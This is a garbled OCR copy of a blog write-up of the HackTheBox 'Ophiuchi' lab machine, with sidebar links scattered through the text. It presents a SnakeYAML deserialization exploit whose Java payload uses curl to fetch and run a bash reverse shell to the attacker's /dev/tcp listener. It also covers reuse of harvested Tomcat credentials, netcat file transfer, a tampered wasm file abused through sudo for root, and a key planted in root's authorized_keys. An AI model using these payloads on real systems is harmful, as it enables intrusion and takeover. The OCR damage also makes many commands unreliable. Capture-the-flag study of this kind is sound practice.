‘uayz02 Hacithebex Ophiuchi- Witeup — fmash's blog Hackthebox Ophiuchi - Writeup Cire Fy (/index. html) fmash16 Student Infosec & Linux Enthusiast About me (/about.html) This is a medium difficulty hackthebox machine, a exploited using YAML deserialization vulnerablity for (mailto: fmash16agmail.comrakeVAML used in java applications, and modifying wasm QO file to get root privileges. (https: //github.com/fmash16) p s We Write the IP of the machine to our /etc/hosts file (https: //twitter.com/fmasht6) wo echo "10.10.10.227 ophiuchi.htb” >> /etc/hosts (https: //reddit.com/user/fmash16) Nmap Scan Open ports: hitpslimash16thub jfcontentwriteupsinacktheboxto-Ophiuch him ant‘uarzo2s Hacithebex Ophiuchi- Witeup — fmash's blog + 22/tep open ssh OpenSSH 8.2p1 Ubuntu 4ubuntud.1 (Ubuntu Linux; protocol 2.8) + 8080/tcp open http Apache Toncat 9.0.38 Enumeration Port 8080 - Apache tomcat server (/index.htm1) Going over to the page, we find a YAML parser. YAML is a human-readable data-serialization language. It is fmash16 connonly used for configuration files and in Student applications where data is being stored or transmitted. Infosec & Linux So lets check if we can exploit it using deserialization wulnerability. Googling for a bit, we find that SnakeYAML which is used in Java applications is 2 wilnerable to deserialization. Found a really good (mailto: fmash1 6gmail.confediua blog by Swapneil Kumar Dash here, O° {httes: //medium. com/fiswapnei ldash/snakeyanl- Enthusiast About me (/about.html) (https: //github. com/fmashts}"ilization-exnloited-béazcfaciBsa) wv . coats . n use this deserialization vulnerablity to get (http fbuitter. con/fnasht§), code execution. The original paper is to be found htto: ys ‘thub.com/mbech) hal (https: Hedi. con/user raat ‘github .con/mbechler/marshalsec thub.com/nbechler/marshalsec) And the YANL payload we are going to use is found at https: //github.con/artsploit/yaml-payload (https: //github.com/artsploit/yaml-payload). SnakeYAML deserialization exploit htps:mash 6 gthub jfcontenvwritaupsthacktheboxtte-Ophiuchi html ant‘uarzo2s (/index. html) fmash16 Student Infosec & Linux Enthusiast About me (/about.html) g (mailte oO Hacithebex Ophiuchi- Witeup — fmash's blog We clone the repo and edit AwesoneScriptEngineFactory.java file to execute are desired commands. git clone https://github.com/artsploit/yaml-payl We can execute system commands useing the Runtime. getRuntine().exec() . We write a bash script revshell.sh as follows #!/bin/sh bash -i >& /dev/tcp/10.10.14.6/8888 9>61 Next we insert the commands to be executed on target machine. We use curl to get the revshell.sh fron our machine and execute it. mash16égmail.com) (https://github.com/fmash16) vy (https: //twitter.com/fmash16) & (https: //reddit.com/user/fmash16) htps:mash 6 gthub jfcontenvwritaupsthacktheboxtte-Ophiuchi html ant‘uarzo2s Hacithebex Ophiuchi- Witeup — fmash's blog package artsploit; import javax.script.Scriptengine; import javax.script.ScriptengineFactory; import java.io. IOException; import java.util.List; public class AwesomeScriptEngineFactory implement public AwesomeScriptengineFactory() { try { Runtime. getRuntime().exec(*curl htt Runtime. getRuntime().exec("bash /tmp/ (Findex.ntal) } catch (10Exception e) { fmash16 e.printstackTrace(); Student } Infosec & Linux } Enthusiast About me (/about.html) 8 (mailto: fmash16agmail.com) E 9 Now as per the instructions, we use the following (https: //github.com/fmashl ands to get our payload jar file vy (https: //twitter..com/fmash16) é cd_yaml-payload (https: //reddit.com/user/fmasht6}rc/artsploit/AwesomeScriptengineFactory. ja jar -cvf yaml-payload.jar -C src/ . Now, we have our payload jar file. We start a python web server at port 80 and insert the following YANL into the parser to get RCE. We also open a nc listener at port 8888 to get our reverse shell. htps:mash 6 gthub jfcontenvwritaupsthacktheboxtte-Ophiuchi html‘uarzo2s Hackthebex Ophiuchi- Writeup — fmash's blog python3 -m http.server 86 !!javax.script.ScriptengineManager [ !!java.net.URLClassLoader [[ !Java.net.URL ["http://10.10.14.6/yaml-paylo i] We can now get our reverse shell as user tomcat . (/index. html) frash16 Privilege Escalation - User Student a Infosec & Linux Enthusiast Going to the home directory, we find a user named About me (/about. html) admin 8 Browsing around, we find the user creds in the file (mailto: [email protected]/toncat/conf/toncat-users.xsd . We find the Oo following in the file (https: //github.com/fmas (nttps:/]twitter con/aa nies username="admin" password="whythereisalimi- oS > (https: //reddit.com/user/fmash16) Creds found: User: admin Password: whythereisalimit We can now ssh into the machine as suer admin using the obtained creds. htps:mash 6 gthub jfcontenvwritaupsthacktheboxtte-Ophiuchi html sit‘uarzo2s Hacithebex Ophiuchi- Witeup — fmash's blog Privilege Escalation - root First, we check what sudo capabilities our user admin got using sudo -1. We find the following (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functi . So we can run (index.html) Jusr/bin/go run /opt/wasm-functions/index.go with root fmash16 privileges. Let’s check out the file. We get the Student following Infosec & Linux Enthusiast About me (/about.html) 8 (mailto: fmash16agmail.com) QO (https: //github.com/fmash16) vy (https: //twitter.com/fmash16) & (https: //reddit.com/user/fmash16) htps:mash 6 gthub jfcontenvwritaupsthacktheboxtte-Ophiuchi html‘uarzo2s Hackthebex Ophiuchi- Writeup — fmash's blog (/index. html) fmash16 Student Infosec & Linux Enthusiast About me (/about.html) g (mailto: [email protected] (nttps://eithub.con/tnast (https :/Tevittor.con/ fe (https reddit. com/user, package main import ( "fmt" wasm "github. com/wasmerio/wasmer-go/wasme s/exec” "Log" func main() { bytes, _ := wasm.ReadBytes("main.wasm") instance, _ := wasm.NewInstance(bytes) defer instance.Close() init := instance.Exports["info" result, := init() f := result.String() if (f t= "1") fmt.Println("Not ready to deploy’ } else { ) fmt.PrintIn("Ready to deploy") out, err := exec.Command("/bin/sh 16) if err != nil { log. Fatal(err) 16) } fnash16) ; fmt.Printin(string(out)) } Here, we see that, functions and variables ar imported fron the main.wasm file and checking the value of the varibale f, if it equals 1, we get ready to deploy and execute /bin/sh deploy.sh htps:mash 6 gthub jfcontenvwritaupsthacktheboxtte-Ophiuchi html ms‘uarzo2s (/index. html) fmash16 Student Infosec & Linux Hackthebex Ophiuchi- Writeup — fmash's blog What’s notable here is that absolute path is not used for main.wasm and the deploy.sh files. So we can manipulate these. These files will be read from our current working directory, from where we run the ‘index.go file. We make our working directory in tmp and copy over the main.wasm file. cd tmp mkdir work 8& cd work cp /opt/wasm-functions/main.wasm ./ We write our own deploy.sh file that echos out the id of the user. Enthusiast Hi /bin/sh About me (/about.html) echo $(id) 8 (nailto:frash!6dgnail con, we run the following as sudo (https: //github.com/fmash16) wv sudo /usr/bin/go run /opt/wasm-functions/index.g (https: //twitter.com/fmash16) é , (https: //reddit.com/user/fmasb1Ad error Not ready to deploy . So the value of f is not 1, which is read from the wasm file. Wasn is short for WebAssembly. WebAssenbly is an open standard that defines @ portable binary-code format for executable prograns, and a corresponding textual assembly language, as well as interfaces for facilitating interactions between such prograns and their host environment. htps:mash 6 gthub jfcontenvwritaupsthacktheboxtte-Ophiuchi html‘uarzo2s htps:mash 6 gthub jfcontenvwritaupsthacktheboxtte-Ophiuchi html (/index. html) fmash16 Student Infosec & Linux Enthusiast About me (/about.html) g (mailte oO (https://github.com/fmash16) wv (https: //twitter.com/fma & (https: //reddit.com/user, [email protected] Hackthebex Ophiuchi- Writeup — fmash's blog The text readable format of WASM binary is WAT(Web Assembly Text). We can manipulate the value of editing the wasm file in this format. We install the toolsuit https: //gi thub. con/webassenbly/wabt (https: //github.com/webassenbly/wabt) We have 2 binaries wasm2wat and wat2wasm that we can use. We transfer the main.wasm file from the target machine to our local machine using ne cat main.wasm | nc {your-ip} {your-port} (on t ne -Lnvp {your-port} > main.wasm (on Lo) We convert the wasm to wat and get the following wasm2wat main.wasm > main.wat cat main.wat (module (type (505) (func (result i32)) (func $info (type ©) (result i32) i32.const 6) (table (;0;) 1 1 funcref) fmasffRByey (595) 16) < h16) (global (;0;) (mut i32) (i32.const 1048576) (global (;1;) 132 (432.const 1048576) (global (;2;) 132 (i32.const 1048576) (export "memory" (memory ©)) (export “info” (func $info)) (export "__data_end" (global 1)) (export "__heap_base" (global 2))) ont‘uarzo2s (/index. html) fmash16 Student Infosec & Linux Enthusiast About me (/about.html) 8 (mailto: fmash16dgmail.comip the authorized keys file at /root/.ssh/ using the oO (https: //github.com/fmash'Rs}- vy (https: //twitter.com/fma & (https: //reddit.com/user, Hacithebex Ophiuchi- Witeup — fmash's blog Here ue see that the value of f is a constant 0, we change that to 1, our required value. (1 i32.const 6) (+] i32.const 1) Now we conver the wat back to nasm and move it to our target machine working directory. wat2wasm main.wat sep main.wasm admindophiuchi.htb: /tmp/work Now, we run the sudo conmand again. And this time we get connand execution as root Ready to deploy uid=0(root) gid=0(root) groups=6(root) We get our id-rsa.pub using ssh-keygen and paste it deploy.sh fileto be able to SSH into the machine as N18) jein/sh fnashl@).) echo "ssh-rsa AAAAB3NzaClyc2EAAAADAQABAt# eee eee: zHy+9fuMs= rootakali" >> /root/.ssh/authorized_ke| Now we can ssh into root and get our root.txt file htps:mash 6 gthub jfcontenvwritaupsthacktheboxtte-Ophiuchi html sont‘uarzo2s Hackthebex Ophiuchi- Writeup — fmash's blog ssh [email protected] cat root. txt Generated with a sodified version of sse5 https: //eithud.con/faash16/ssg5) By frash16 © 2020-2020 (/index. html) fmash16 Student Infosec & Linux Enthusiast About me (/about.html) g (mailto: fmash16agmail.com) (https://github.com/fmash16) wv (https: //twitter.com/fmash16) (https: //reddit.com/user/fmash16) htps:mash 6 gthub jfcontenvwritaupsthacktheboxtte-Ophiuchi html an